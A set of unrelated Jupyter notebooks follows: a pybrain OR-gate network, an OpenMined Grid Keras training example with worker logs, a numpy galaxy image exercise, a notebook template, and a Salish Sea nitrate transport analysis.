# Output: a is b = False
print(" a is b =", a is b)
# Output: a is not b = True
print(" a is not b =", a is not b)
a = [1,2,3,4,5]
b = ['1','2','3','4','5']
# Output: a is b = False
print(" a is b =", a is b)
# Output: a is not b = True
print(" a is not b =", a is not b)
###Output
a is b = False
a is not b = True
|
semana07-30-10-2020/funcoes-logicas-pybrain/.ipynb_checkpoints/Rede Neural - OR-checkpoint.ipynb | ###Markdown
Implementing an OR Logic Function with Neural Networks Creating a neural network with pybrain for the OR logic gate. 
###Code
# importando as funções da biblioteca pybrain do python
from pybrain.tools.shortcuts import buildNetwork
from pybrain.datasets import SupervisedDataSet
from pybrain.supervised.trainers import BackpropTrainer
from pybrain.structure.modules import SigmoidLayer
from pybrain.structure.modules import LinearLayer
# definindo uma rede neural com 2 neurônios na camada de entrada, 3 na camada oculta e 1 na camada de saída
# usando o melhoramento 'LinearLayer' na função de ativação das camadas ocultas
# usando o melhoramento 'SigmoidLayer' na função de ativação da camada de saída
rede = buildNetwork(2, 3, 1, hiddenclass = LinearLayer, outclass = SigmoidLayer)
# definindo uma base de dados com 2 entradas nos atributos previsores e 1 saída no atributo meta
base = SupervisedDataSet(2, 1)
# adicionando o primeiro dado para o treinamento da base de dados
base.addSample((0,0), (0, ))
# adicionando o segundo dado para o treinamento da base de dados
base.addSample((0,1), (1, ))
# adicionando o terceiro dado para o treinamento da base de dados
base.addSample((1,0), (1, ))
# adicionando o quarto dado para o treinamento da base de dados
base.addSample((1,1), (1, ))
# observe que os dados obedecem ao estilo da estrutura de condição lógica OR
# visualizando os atributos previsores da base de treinamento
print(base['input'])
# visualizando os atributos meta da base de treinamento
print(base['target'])
# definindo o objeto de treinamento para a base de dados criada
# a taxa de aprendizagem será de 0.01
# o momentum será de 0.06
treinamento = BackpropTrainer(rede, dataset = base, learningrate = 0.01, momentum = 0.06)
# criando uma lista para plotar um gráfico para a taxa de erro do algoritmo
eixoX = list()
eixoY = list()
# estrutura de repetição para realizar o treinamento da rede neural 5000 vezes
for indice in range(1, 5000):
# fazendo o treinamento com a base de dados criada
erro = treinamento.train()
eixoX.append(indice - 1)
eixoY.append(erro)
# mostra a taxa de erro a cada 1000 repetições
if indice % 1000 == 0:
print('Erro: {}'.format(erro))
# visualizando a capacidade de predição do algoritmo
print(rede.activate([0, 0])) # saída esperada: próximo de 0
print(rede.activate([1, 0])) # saída esperada: próximo de 1
print(rede.activate([0, 1])) # saída esperada: próximo de 1
print(rede.activate([1, 1])) # saída esperada: próximo de 1
# importando a biblioteca de funções matplotlib do Python
import matplotlib.pyplot as plt
# definindo as dimensões do gráfico
plt.figure(figsize = (10,5))
# plotando o gráfico da taxa de erro durante cada treinamento
plt.plot(eixoX, eixoY, color = "Red", label = "Gráfico da taxa de erro após cada etapa do treinamento")
# plotando o título do gráfico
plt.title("Taxa de Erro do algoritmo")
# adicionando uma grade ao gráfico
plt.grid(True)
# removendo a moldura do gráfico
plt.box(False)
# adicionando as legendas do gráfico
plt.legend()
# adicionando uma legenda ao eixo x
plt.xlabel("Treinamento")
# adicionando uma legenda ao eixo y
plt.ylabel("Erro")
###Output
_____no_output_____ |
notebooks/experimental/Client Worker Tree.ipynb | ###Markdown
IMDB FastText ExampleAdapter for Grid from https://raw.githubusercontent.com/keras-team/keras/master/examples/imdb_fasttext.py
###Code
from grid.clients.keras import KerasClient
client = KerasClient()
from __future__ import print_function
import numpy as np
import os
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Embedding
from keras.layers import GlobalAveragePooling1D
from keras.datasets import imdb
ngram_range = 1
max_features = 20000
maxlen = 400
batch_size = 32
embedding_dims = 50
epochs = 5
model = Sequential()
# we start off with an efficient embedding layer which maps
# our vocab indices into embedding_dims dimensions
model.add(Embedding(max_features,
embedding_dims,
input_length=maxlen))
# we add a GlobalAveragePooling1D, which will average the embeddings
# of all words in the document
model.add(GlobalAveragePooling1D())
# We project onto a single unit output layer, and squash it with a sigmoid:
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
from pathlib import Path
task = 'imdb10'
parent_folder = os.path.abspath('..')
client.add_task(task, adapter=f'{parent_folder}/grid/adapters/imdb.py')
client.add_model(task, model)
# model.fit(x_train, y_train,
# batch_size=batch_size,
# epochs=epochs,
# validation_data=(x_test, y_test))
###Output
Using TensorFlow backend.
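###Markdown
The commented-out `model.fit(...)` call above would be the local training step; here the data handling is delegated to the `imdb.py` adapter registered with `add_task`. For reference, the preparation that adapter presumably performs follows the upstream Keras example this notebook is based on — a sketch only, not executed here:
###Code
# Sketch of the standard Keras IMDB preprocessing from the upstream example
# (assumed to be roughly what the Grid adapter does on the worker side).
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features)
x_train = sequence.pad_sequences(x_train, maxlen=maxlen)  # pad/truncate reviews to a fixed length
x_test = sequence.pad_sequences(x_test, maxlen=maxlen)
print(x_train.shape, x_test.shape)
###Output
_____no_output_____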
###Markdown
Worker
###Code
from grid.workers.tree import GridTree
worker_tree = GridTree()
###Output
[34mUPDATE: [0mConnecting to IPFS... this can take a few seconds...
[32mSUCCESS: [0mConnected!!! - My ID: QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
[32m v . ._, |_ .,
`-._\/ . \ / |/_
\ _\, y | \//
_\_.___\, \/ -.\||
`7-,--.`._|| / / ,
/' `-. `./ / |/_.'
| |//
[33mRunning Grid in[32m |_ /
[33mTree Mode[32m |- |
| =|
| |
--------------------/ , . \--------._[0m
[34mUPDATE: [0mQuerying known workers...
WORKER: /p2p-circuit/ipfs/Qmaosc64H6Y29VFCFYJzJXCX9AuRp7RCsekLmajHNVEARD...[32mSUCCESS!!![0m
WORKER: /p2p-circuit/ipfs/QmQabt3SWuDvjse9z7GAcH2BGQv4wH8bumkd4x5oXN2obX...[31mFAIL!!![0m
[34mUPDATE: [0mSearching for IPFS nodes - 34 found overall - 1 are OpenMined workers
[32mSUCCESS: [0mFound 1 OpenMined nodes!!!
[37m[40m TASKS [0m
From Name Address
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod==================================================================
QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb8 QmXCQVa2iXAPhFWDSRTVuh7kGSXiw1j5T7zGztPBBRwAQg
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodall parts .... ['', 'Users', 'yanndupis', '.openmined']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
full path /Users/yanndupis/.openmined/grid/
full path /Users/yanndupis/.openmined/grid/adapters/
Loading data...
25000 train sequences
25000 test sequences
Average train sequence length: 238
Average test sequence length: 230
Pad sequences (samples x time)
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodx_train shape:
(25000, 400)
x_test shape: (25000, 400)
Build model...
QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb9 QmRJF6noF4RhmkDpkzbzP3KLitMZNHs8mg6vGT8J5zURAt
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
all parts .... ['', 'Users', 'yanndupis', '.openmined']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
full path /Users/yanndupis/.openmined/grid/
full path /Users/yanndupis/.openmined/grid/adapters/
Loading data...
25000 train sequences
25000 test sequences
Average train sequence length: 238
Average test sequence length: 230
Pad sequences (samples x time)
x_train shape:listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
(25000, 400)
x_test shape: (25000, 400)
Build model...
QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb10 QmS1KzjYMx1qjE3EvE3BJYBxjxQfXXrhthxteyqjBZWBFhlisting models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
all parts .... ['', 'Users', 'yanndupis', '.openmined']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
full path /Users/yanndupis/.openmined/grid/
full path /Users/yanndupis/.openmined/grid/adapters/
Loading data...
25000 train sequences
25000 test sequences
Average train sequence length: 238
Average test sequence length: 230
Pad sequences (samples x time)
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodx_train shape:
(25000, 400)
x_test shape: (25000, 400)
Build model...
[37m[40m TASKS [0m
From Name Address
==================================================================
QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb8 QmXCQVa2iXAPhFWDSRTVuh7kGSXiw1j5T7zGztPBBRwAQg
ALREADY SUBSCRIBED TO openmined:task:add:imdb8
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
all parts .... ['', 'Users', 'yanndupis', '.openmined']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
full path /Users/yanndupis/.openmined/grid/
full path /Users/yanndupis/.openmined/grid/adapters/
Loading data...
25000 train sequences
25000 test sequences
Average train sequence length: 238
Average test sequence length: 230
Pad sequences (samples x time)
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
x_train shape: (25000, 400)
x_test shape: (25000, 400)
Build model...ALREADY SUBSCRIBED TO openmined:task:add:imdb9
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodQmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb9 QmRJF6noF4RhmkDpkzbzP3KLitMZNHs8mg6vGT8J5zURAt
all parts .... ['', 'Users', 'yanndupis', '.openmined']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
full path /Users/yanndupis/.openmined/grid/
full path /Users/yanndupis/.openmined/grid/adapters/
Loading data...
25000 train sequences
25000 test sequences
Average train sequence length: 238
Average test sequence length: 230
Pad sequences (samples x time)
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
x_train shape: (25000, 400)
x_test shape: (25000, 400)
Build model...
QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb10 QmS1KzjYMx1qjE3EvE3BJYBxjxQfXXrhthxteyqjBZWBFhALREADY SUBSCRIBED TO openmined:task:add:imdb10
listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod
all parts .... ['', 'Users', 'yanndupis', '.openmined']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters']
full path /
full path /Users/
full path /Users/yanndupis/
full path /Users/yanndupis/.openmined/
full path /Users/yanndupis/.openmined/grid/
full path /Users/yanndupis/.openmined/grid/adapters/
Loading data...
25000 train sequences
25000 test sequences
Average train sequence length: 238
Average test sequence length: 230
Pad sequences (samples x time)
x_train shape: (25000, 400)
x_test shape: (25000, 400)
Build model...
|
numpy/Numpy_GalaxyMultiWaveLength_sol.ipynb | ###Markdown
Galaxy multiWaveLength Analysis using numpyData Source: https://asd.gsfc.nasa.gov Loading the libraries we need
###Code
%matplotlib inline
import numpy as np
import imageio
from skimage import color
import matplotlib.pyplot as plt
import copy
from skimage.color import rgb2gray
from PIL import Image
###Output
_____no_output_____
###Markdown
Creating a numpy array from an image file: load and display each picture from the different wavelengths (GammaRay, Xray, Infrared, radio), find the shape of the array, and explain each dimension.Sample of output:(320, 5760, 3)
###Code
photo_xRay = imageio.imread('./multiwavelength/Xray.jpg')
fig, ax=plt.subplots(figsize=(18, 4))
ax.imshow(photo_xRay , cmap='gray')
print(photo_xRay.shape)
plt.imshow(photo_xRay)
plt.show()
###Output
_____no_output_____
###Markdown
As we have 3 dimensions (RGB) and the RGB channels do not add information, merge the 3 channels into a single one by converting to a greyscale image with the function rgb2gray.Sample of output:(320, 5760)
###Code
photo_xRay = imageio.imread('./multiwavelength/Xray.jpg')
photo_xRay_grey = color.rgb2gray(photo_xRay)
fig, axRay=plt.subplots(figsize=(18, 4))
axRay.imshow(photo_xRay_grey, cmap='gray')
print(photo_xRay_grey.shape)
photo_radio = imageio.imread('./multiwavelength/Radio.jpg')
photo_radio_grey = color.rgb2gray(photo_radio)
fig, axRadio=plt.subplots(figsize=(18, 4))
axRadio.imshow(photo_radio_grey, cmap='gray')
photo_gammaRay = imageio.imread('./multiwavelength/GammaRay.jpg')
photo_gammaRay_grey = color.rgb2gray(photo_gammaRay)
fig, axGamma=plt.subplots(figsize=(18, 4))
axGamma.imshow(photo_gammaRay_grey, cmap='gray')
###Output
(320, 5760)
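###Markdown
The Infrared band mentioned above can be converted to greyscale in exactly the same way. A sketch — it assumes a file './multiwavelength/Infrared.jpg' sits next to the others, and the band is not used in the three-channel merge below:
###Code
# Hypothetical extra band, following the same pattern as the X-ray/radio/gamma cells above.
photo_infrared = imageio.imread('./multiwavelength/Infrared.jpg')
photo_infrared_grey = color.rgb2gray(photo_infrared)
fig, axInfrared = plt.subplots(figsize=(18, 4))
axInfrared.imshow(photo_infrared_grey, cmap='gray')
###Output
_____no_output_____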
###Markdown
Merge all 3 wavelengths into a single RGB image. Define which color each of the XRay, Radio and Gamma wavelengths is mapped to.Sample of output:
###Code
photo_all_band=copy.deepcopy(photo_xRay)
photo_all_band[:,:,0]=photo_xRay_grey*255
photo_all_band[:,:,1]=photo_radio_grey*255
photo_all_band[:,:,2]=photo_gammaRay_grey*255
fig, axAll=plt.subplots(figsize=(18, 4))
axAll.imshow(photo_all_band)
###Output
_____no_output_____
###Markdown
Apply some cleaning to remove noise with values < 150.Sample of output:
###Code
photo_all_band_cleaning_mask=photo_all_band<150
photo_all_band[photo_all_band_cleaning_mask]=0
fig, axFilter=plt.subplots(figsize=(18, 4))
axFilter.imshow(photo_all_band)
###Output
_____no_output_____
###Markdown
Apply some cleaning to highlight the parts of the picture where XRay > 220, Radio > 150 and GammaRay > 150.Sample of output:
###Code
photo_all_band_highligt_mask=(photo_all_band[:,:,0]>220)&(photo_all_band[:,:,1]>150)&(photo_all_band[:,:,2]>150)
print(photo_all_band_highligt_mask)
#photo_all_band[photo_all_band_highligt_mask]=255
plt.imshow(photo_all_band_highligt_mask)
photo_all_band_cleaned=copy.deepcopy(photo_all_band)
photo_all_band_cleaned[np.logical_not(photo_all_band_highligt_mask)]=0
fig, axHighLight=plt.subplots(figsize=(18, 4))
axHighLight.imshow(photo_all_band_cleaned)
###Output
[[False False False ... False False False]
[False False False ... False False False]
[False False False ... False False False]
...
[False False False ... False False False]
[False False False ... False False False]
[False False False ... False False False]]
###Markdown
Only a single part of the picture should be highlighted. Try to find the center of its position using the following mask:
###Code
total_rows, total_cols, total_layers = photo_all_band.shape
#print("photo_data = ", photo_data.shape)
X, Y = np.ogrid[:total_rows, :total_cols]
fig = plt.figure()
print("X = ", X.shape, " and Y = ", Y.shape)
plt.imshow(photo_all_band)
plt.show()
summ=0
for colPotentialCenter in range(0,total_cols,100):
for rowPotentialCenter in range (0,total_rows,100):
#print("center_row = ", center_row, "AND center_col = ", center_col)
dist_from_potential_center = (X - rowPotentialCenter)**2 + (Y - colPotentialCenter)**2
#print(dist_from_center)
radius = 1000
#print("Radius = ", radius)
circular_mask = (dist_from_potential_center > radius)
#print(circular_mask[1500:1550,2000:2200])
#photo_all_band_filtered[np.logical_not(circular_mask)] = 255
if (photo_all_band[np.logical_not(circular_mask)].sum()>summ):
summ=photo_all_band[np.logical_not(circular_mask)].sum()
centerOfBurstrowID=rowPotentialCenter
centerOfBurstcolID= colPotentialCenter
plt.show()
#print("center X = ", centerOfBurstrowID, " and center Y = ", centerOfBurstcolID)
fig, axCircular=plt.subplots(figsize=(18, 4))
axCircular.imshow(photo_all_band)
axCircular.vlines(centerOfBurstcolID,0,total_rows,colors='w')
axCircular.hlines(centerOfBurstrowID,0,total_cols,colors='w')
###Output
X = (320, 1) and Y = (1, 5760)
|
book/community/templates/template-environments-postprocessing.ipynb | ###Markdown
[Post-processing pipeline/dataset name]:::{eval-rst}:opticon:`tag`:badge:`[Environment],badge-primary`:badge:`Post-processing,badge-secondary`::: Context Purpose*Describe the purpose of the use case.* Post-processing approach*Describe the most relevant features of the post-processing pipeline.* Highlights*Provide 3-5 bullet points that convey the use case’s core procedures. Each bullet point must have a maximum of 85 characters, including spaces.** Highlight 1* Highlight 2 Contributions NotebookAuthor (role), Affiliation, GitHub alias Post-processing codebaseAuthor (role), Affiliation, GitHub alias Post-processing publications```{bibliography} :style: plain :list: bullet :filter: topic % "replace by the `topic` entry linked to the publication(s) in the `_bibliography/references.bib` file"``` Post-processing fundingIndicate details of the funding.:::{note}*Optional: add credits or acknowledgements to data providers or authors of code snippets*::: Install and load libraries*For installation, add only libraries not listed in the [environment.yml](https://github.com/alan-turing-institute/environmental-ds-book/blob/master/environment.yml) file, but required by the notebook. Libraries can be installed in silent mode e.g. `pip -q install `**For loading libraries, order them according to their role e.g. libraries to manipulate folders i.e. os (first), handle data i.e. numpy, xarray (second), visualisation e.g. holoviews (third), etc. The cell below contains two libraries, `os` and `warning` which are common among the notebooks. Don't remove them.*
###Code
import os
import warnings
warnings.filterwarnings(action='ignore')
###Output
_____no_output_____
###Markdown
Set project structure*The cell below creates a separate folder to save the notebook outputs. This facilitates the reader to inspect inputs/outputs stored within a defined destination folder. Change `` with your notebook identifier.*
###Code
notebook_folder = '../postprocessing/<replace-by-notebook-filename>'
if not os.path.exists(notebook_folder):
os.makedirs(notebook_folder)
###Output
_____no_output_____
###Markdown
Load data*Load full dataset from original or mirror sources. If the license of the dataset permits, we suggest creating sample data (preprocessed) for the notebook stored in a data repository e.g. Zenodo.* Preprocessing*Add code demonstrating the post-processing pipeline.* Outputs*Provide a brief inspection of the post-processing outputs and their interpretation* Summary*Provide 3-5 bullet points summarising the main aspects of the post-processing and tools covered in the notebook.* * Sentence 1 e.g. `tool-name` to perform...* Sentence 2 e.g. `tool-name` to perform... Additional information**License**: The code in this notebook is licensed under the MIT License. The Environmental Data Science book is licensed under the Creative Commons by Attribution 4.0 license. See further details [here](https://github.com/alan-turing-institute/environmental-ds-book/blob/master/LICENSE.md).**Contact**: If you have any suggestion or report an issue with this notebook, feel free to [create an issue](https://github.com/alan-turing-institute/environmental-ds-book/issues/new/choose) or send a direct message to [[email protected]](mailto:[email protected]).
###Code
from datetime import date
print(f'Last tested: {date.today()}')
###Output
_____no_output_____ |
notebooks/revisions/transportsUpper6-WithArrowsAndV-noMRub.ipynb | ###Markdown
6 m is the mean nitricline depth and just below the 10% light level
###Code
import matplotlib.pyplot as plt
import netCDF4 as nc
import numpy as np
import os
import glob
import datetime as dt
from salishsea_tools import viz_tools
from matplotlib.ticker import FormatStrFormatter
import cmocean
from salishsea_tools import viz_tools, evaltools as et
import NorthNut as nn
import matplotlib.gridspec as gridspec
import pickle
import matplotlib as mpl
import matplotlib.patheffects as path_effects
mpl.rc('xtick', labelsize=8)
mpl.rc('ytick', labelsize=8)
mpl.rc('legend', fontsize=8)
mpl.rc('axes', titlesize=8)
mpl.rc('axes', labelsize=8)
mpl.rc('figure', titlesize=8)
mpl.rc('font', size=8)
mpl.rc('text', usetex=True)
mpl.rc('text.latex', preamble = r'''
\usepackage{txfonts}
\usepackage{lmodern}
''')
mpl.rc('font', family='sans-serif', weight='normal', style='normal')
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
%matplotlib inline
ig0=nn.ig0
ig1=nn.ig1
jg0=nn.jg0
jg1=nn.jg1
tmask=nn.tmask
umask=nn.umask
vmask=nn.vmask
umask0=nn.umask0
vmask0=nn.vmask0
boxCol=nn.boxCol
colL=nn.colL
colR=nn.colR
e12t=nn.e12t
k=6 #depth presented here
k1=30 # max depth to do calcs to
start=dt.datetime(2015,5,15) # originally 5/15-8/15, but changed to even number of fortnights (6, end is included)
end=dt.datetime(2015,8,20)
mod_basedir='/data/eolson/results/MEOPAR/SS36runs/CedarRuns/rev_noMrubrum/'
mod_nam_fmt='long'
mod_flen=10
saveloc='/data/eolson/results/MEOPAR/SS36runs/calcFiles/NTransport/'
fver='noMrubrum'
###Output
_____no_output_____
###Markdown
The interval was made a multiple of a fortnight in an attempt to minimize aliasing of the tidal cycle:
###Code
dt.datetime(2015,5,15)+dt.timedelta(days=7*14)
# calc transports: boxes in full model coords
boxes,boxesS=nn.defboxes(k)
np.mean(nn.e1t[boxesS[4]['j'][1],boxesS[4]['i'][0]:boxesS[4]['i'][1]])
np.sum(tmask[6,boxesS[4]['j'][1],(boxesS[4]['i'][0]):(boxesS[4]['i'][1])])*427*7/1e6
np.sum(nn.e3t_0[:7,boxesS[4]['j'][1],boxesS[4]['i'][0]:boxesS[4]['i'][1]],0)
np.diff(np.array(([boxes[0]['j'][1]]+[boxes[el]['j'][0] for el in range(0,6)])))
fig,ax=plt.subplots(1,1,figsize=(3,5))
viz_tools.set_aspect(ax)
ax.pcolormesh(nn.vmask0)
ax.pcolormesh(nn.tmask[0,:,:])
#ax.contour(tmask[k,:,:],[.5])
ax.contour(tmask[0,:,:],[.5])
for el in boxes.keys():
iii,jjj=nn.makebox(nn.boxcoordsT(boxes[el]))
ax.plot(iii-ig0,jjj-jg0,'-',color='w',linewidth=1)
flistV=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_V',1)
flistU=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_U',1)
flistW=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_W',1)
#flistC=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'carp_T',1)
flistT=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'ptrc_T',1)
#flistP=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_T',1)
#flistGV=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_V',1)
#flistGU=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_U',1)
flistT.loc[0,['t_0']].values[0]
flistT.loc[len(flistT)-1,['t_n']].values[0]-dt.timedelta(days=1)
end
NBound, SBound, EBound, BBound, NBoundMix, SBoundMix, EBoundMix, BBoundMix, times, boxes = nn.calcTranspsReduced(
start,end,k1,mod_flen,fver,saveloc,boxes,boxesS,flistV,flistU,flistW,flistT,recalc=False)
# vertical transport into 4th box
np.shape(BBound[3])
###Output
_____no_output_____
###Markdown
* NO3_VT: v*dx*dz*C = mmol N/s
* NO3_UT: u*dy*dz*C = m/s * m2 * mmol/m3 = mmol N/s
* VLDFNO3: dC/dt = (F1-F0)/(dx*dy*dz) => F in mmol N/s
* ULDFNO3: mmol N/s
* NO3_WT: w*dx*dy*C = mmol N/s
* VMIXNO3: ~(Cadz-Cbdz)/dt = mmol/m3 * 1/s * m = mmol N/m2/s
###Code
mapCol=(0.67, 0.8, 0.64) # rgb
cmb=cmocean.tools.crop_by_percent(cmocean.cm.balance, 45, which='both', N=None)
cmb.set_bad(mapCol)
cmc=cmocean.tools.crop_by_percent(cmocean.cm.tarn_r, 40, which='both', N=None)
cmc.set_bad(mapCol)
for el in BBound.keys():
print(el,np.mean(np.sum(BBound[el][:,:k]+BBoundMix[el][:,:k],1))*1e-3)
###Output
0 91.90835155323016
1 86.66483786685788
2 -109.28906201525717
3 61.488358886550685
4 -2.486394686184514
5 47.570619286285726
###Markdown
Sum of vertical mixing and transport NO3 supply to region in boxes:
###Code
np.mean(np.sum(BBound[0][:,:k]+BBoundMix[0][:,:k]+\
BBound[1][:,:k]+BBoundMix[1][:,:k]+\
BBound[2][:,:k]+BBoundMix[2][:,:k]+\
BBound[3][:,:k]+BBoundMix[3][:,:k]+\
BBound[4][:,:k]+BBoundMix[4][:,:k]+\
BBound[5][:,:k]+BBoundMix[5][:,:k],1))*1e-3
###Output
_____no_output_____
###Markdown
Divide by area:
###Code
ABoxes=nn.boxAreas(k)
# units are umol/m2/s
Asum=ABoxes[0]+ABoxes[1]+ABoxes[2]+ABoxes[3]+ABoxes[4]+ABoxes[5]
np.mean(np.sum(BBound[0][:,:k]+BBoundMix[0][:,:k]+\
BBound[1][:,:k]+BBoundMix[1][:,:k]+\
BBound[2][:,:k]+BBoundMix[2][:,:k]+\
BBound[3][:,:k]+BBoundMix[3][:,:k]+\
BBound[4][:,:k]+BBoundMix[4][:,:k]+\
BBound[5][:,:k]+BBoundMix[5][:,:k],1))/Asum*1e3
NBoundC, SBoundC, EBoundC, BBoundC, NBoundMixC, SBoundMixC, EBoundMixC, BBoundMixC = \
nn.transpConversions(boxes,NBound,SBound,EBound,BBound,NBoundMix,SBoundMix,EBoundMix,BBoundMix,k)
BBoundC
mask=dict()
mask['V']=vmask0
mask['U']=umask0
mask['W']=tmask[k,:,:]
fig=plt.figure(figsize=(7.5,5.2))
gs0=gridspec.GridSpec(2,2,hspace=0.24,wspace=.13,left=.01,right=.93,bottom=.022,top=.92,
width_ratios=[1,1],height_ratios=[1,1])
ax=list()
cbax=list()
for jx in range(0,2):
if jx==0:
gsi=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[0,jx],
width_ratios=[10,10*(ig1-ig0-.5)/(ig1-ig0+13),11-10*(ig1-ig0-.5)/(ig1-ig0+13)],wspace=.1)
gsl=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[1,jx],
width_ratios=[10,10,1],wspace=.1)
elif jx==1:
gsi=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[0,jx],
width_ratios=[10,10,1],wspace=.1)
gsl2=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[1,jx],
width_ratios=[10,10,1],wspace=.1)
ax1=fig.add_subplot(gsi[0])
ax1.get_xaxis().set_visible(False)
ax1.get_yaxis().set_visible(False)
viz_tools.set_aspect(ax1)
ax2=fig.add_subplot(gsi[1])
ax2.get_xaxis().set_visible(False)
ax2.get_yaxis().set_visible(False)
viz_tools.set_aspect(ax2)
ax3=fig.add_subplot(gsi[2])
ax.append(ax1,)
ax.append(ax2,)
cbax.append(ax3,)
ax4=fig.add_subplot(gsl2[0])
ax4.get_xaxis().set_visible(False)
ax4.get_yaxis().set_visible(False)
viz_tools.set_aspect(ax4)
ax5=fig.add_subplot(gsl2[1])
ax5.get_xaxis().set_visible(False)
ax5.get_yaxis().set_visible(False)
viz_tools.set_aspect(ax5)
ax6=fig.add_subplot(gsl2[2])
ax7=fig.add_subplot(gsl[0])
viz_tools.set_aspect(ax7)
ax9=fig.add_subplot(gsl[2])
ax.append(ax4,)
ax.append(ax5,)
ax.append(ax7,)
cbax.append(ax6,)
cbax.append(ax9,)
v1=3000
m=ax[0].pcolormesh(mask['V'],cmap=cmb)
ax[0].set_title('Northward NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nAdvection + Mixing')
m=ax[1].pcolormesh(mask['U'],cmap=cmb)
cb0=fig.colorbar(m,cax=cbax[0])
ax[1].set_title('Eastward NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nAdvection + Mixing')
v2=15
m=ax[2].pcolormesh(mask['W'],cmap=cmc)
ax[2].set_title('Vertical NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nAdvection')
m=ax[3].pcolormesh(mask['W'],cmap=cmc)
cb1=fig.colorbar(m,cax=cbax[1])
ax[3].set_title('Vertical NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nMixing')
nn.drawboxesV(ax[0],boxes,boxCol)
nn.drawboxesU(ax[1],boxes,boxCol)
